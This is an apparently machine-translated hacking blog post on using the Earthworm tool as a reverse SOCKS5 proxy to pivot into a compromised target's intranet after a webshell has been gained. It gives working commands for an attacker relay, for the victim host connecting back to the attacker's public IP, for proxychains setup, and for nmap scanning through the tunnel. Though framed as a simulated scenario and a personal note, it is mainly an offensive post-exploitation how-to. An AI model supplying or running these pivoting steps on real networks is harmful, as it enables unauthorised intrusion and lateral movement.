Hacking Book | Free Online Hacking Learning


how to use ew as socks5 agent for intranet penetration

Posted by harmelink at 2020-03-14

0x00 Preface

Recently, there is a need for intranet penetration when setting up a station. The big guy recommended EW to me. This article simulated an attack scenario to make a brief introduction to the use of earthworm. In fact, the corresponding content of the official website of EW has been described in great detail. I am here to make a simple record from the following aspects purely as a personal note:

1. How to use EW as reverse Socks5 proxy

2. How to set the Socks5 proxy to access the target intranet Web Service

3. Using proxychains to set Socks5 proxy for terminal (it is convenient to proxy the traffic of local command line tool into the target intranet)

0x01 basic environment and network topology

Kali Linux (attacker intranet

Ubuntu 16.04.3 (attacker http://120.xxxx.xxx.xxx)

Windows Server 2008 (Visim target intranet http://10.xxxx.xxx.xxx)

Network topology: Kali Linux is a local virtual machine, Ubuntu is an ECS on the public network, Windows Server 2008 is the target machine, internal IP, and some ports are mapped to the external network.

There should be a topology map here. I'll learn about Visio later, and add 23333

0x02 scene simulation

Now we have obtained the permission of a machine in the target intranet (the machine maps port 80 to the Internet, the web service has a vulnerability, and we have obtained webshell). I need to further penetrate the intranet. At present, I have a public Ubuntu and an intranet Kali. How can I reverse Socks5 to proxy Kali's traffic into the target intranet?

0x03 use EW as reverse Socks5 proxy

Here I only demonstrate how to use EW as the reverse Socks5 proxy. For the forward and multi-level cascade proxy, please refer to the official documents.

Step 1: execute the following command on Ubuntu on the public network:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &

This command means that the public network machine listens for ports 1080 and 1024. Wait for the attacker machine to access port 1080 and the target machine to access port 1024.

Step 2: the target machine executes the following command:

ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024

Where the value of - D parameter is just the public IP address

Step 3: attacker machine accesses the target intranet service through proxychains or browser setting Socks5 agent

0x04 browser set Socks5 proxy

Click OK after setting. At this time, you can access the web service of the target intranet through the browser.

0x05 use proxychains to set Socks5 agent for terminal

Step 1: Download and install proxychains

cd /usr/local/src git clone https://github.com/rofl0r/proxychains-ng.git cd proxychains-ng ./configure --prefix=/usr --sysconfdir=/etc make && make install make install-config cd .. && rm -rf proxychains-ng

Step 2: edit proxychains configuration file to set agent

vi /etc/proxychains.conf socks5 120.xx.xx.xx 1080

Step 3: for example: scan the target intranet with proxychains nmap

After setting, you can use the way similar to proxychains nmap to proxy the traffic of nmap to the target intranet for scanning. Other command-line tools are the same.

0x06 postscript

In the process of using, there are also some problems, some tools do not use the sock5 agent, it is very embarrassing, the specific reason is unknown. I'm a little sleepy. I'll go home and sleep. I'll solve the rest tomorrow. The body is the capital of revolution.

I hope that the students interested in this aspect can get something from this article by chance. Of course, if there are any mistakes, please do not hesitate to comment.

0x07 reference link

Post penetration for a large domestic plant - continuous

Using proxychains to use Socks5 proxy CSDN blog in terminal